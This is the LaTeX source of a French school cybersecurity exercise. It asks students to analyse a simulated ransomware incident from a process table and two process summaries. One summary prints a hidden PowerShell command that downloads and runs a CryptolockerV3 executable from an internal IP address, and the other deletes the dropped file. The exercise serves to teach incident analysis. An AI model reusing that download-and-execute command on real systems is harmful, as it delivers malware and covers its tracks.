\documentclass[12pt,a4paper,article,english,firamath]{nsi}
\pagestyle{empty}
\begin{document}
\titre{Analyse d'une malveillance}
\classe{NSI - Cyber}
\maketitle

Grâce à ses outils, le service sécurité d'une entreprise vient de détecter une malveillance sur une de ses machines pour la première fois. On peut donc supposer que jusqu'alors la machine n'était pas compromise.\\
Voici un extrait des processus concernés lors de l'incident :
\begin{center}
    \tabstyle[UGLiRed]
    \begin{tabular}{l|c|c|}
        \ccell Process    & \ccell PID & \ccell PPID \\
        cmd.exe           & 6993       & 6976        \\
        cmd.exe           & 7331       & 7261        \\
        conhost.exe       & 7112       & 6993        \\
        conhost.exe       & 7628       & 7331        \\
        ffvpfmn.exe       & 7356       & 7261        \\
        CryptolockerV3... & 7261       & 6993        \\
        powershell.exe    & 7268       & 6993        \\
        WINWORD.EXE       & 6976       & 4038        \\
    \end{tabular}
\end{center}



Voici également l'analyse faite de deux processus de cette liste :
\begin{center}

    \begin{tcolorbox}[colback=white,colframe=UGLiRed!75,width=12cm]
        {\color{UGLiBlue}\titlefont{PROCESS SUMMARY}}\\
        \textbf{User:} N/A\\
        \textbf{Name:} cmd.exe (CLI interpreter)\\
        \textbf{UID:} FF5A27C765D10611\\
        \textbf{ID:} 6993\\
        \textbf{Command Line:}
        \texttt{/c powershell.exe -nop -exec\\
            bypass -w hidden "((New-Object System.Net.W\\
            ebClient).DownloadFile('http://192.168.50.1\\
            04/CryptolockerV3.symptomatic.exe','\%TEMP\%\backslash\\
            CryptolockerV3.symptomatic.exe'))"\&\%TEMP\%\backslash C\\ryptolockerV3.symptomatic.exe}
    \end{tcolorbox}


    \begin{tcolorbox}[colback=white,colframe=UGLiRed!75,width=12cm]
        {\color{UGLiBlue}\titlefont{PROCESS SUMMARY}}\\
        \textbf{User:} N/A\\
        \textbf{Name:} cmd.exe (CLI interpreter)\\
        \textbf{UID:} 7D94F65F58D992F7\\
        \textbf{ID:} 7331\\
        \textbf{Command Line:}
        \texttt{/c del C:\backslash Users\backslash OCD-VI$\sim$1\backslash AppDat\\
            a\backslash Local\backslash Temp\backslash CRYPTO$\sim$1.EXE>>NUL}\\
    \end{tcolorbox}
\end{center}
\begin{enumerate}
    \item Rechercher sur internet ce qu'est \texttt{cmd.exe} et son rapport avec \texttt{conhost.exe}.
    \item Reconstruire l'arborescence des processus.
    \item La détection s'est faite au niveau du processus 6993.
    \begin{enumalph}
        \item Expliquer comment ce processus a pu être lancé.
        \item Décrire sommairement ce qu'a fait ce processus.
        \item Donner le nom du fichier binaire malveillant.
        \item Donner la provenance de ce fichier et les implications qui en découlent.
    \end{enumalph}
    \item Décrire ce que fait le processus 7331 et le but de cette action.
    \item Dire quel processus poursuit très probablement une action malveillante.
\end{enumerate}

\end{document}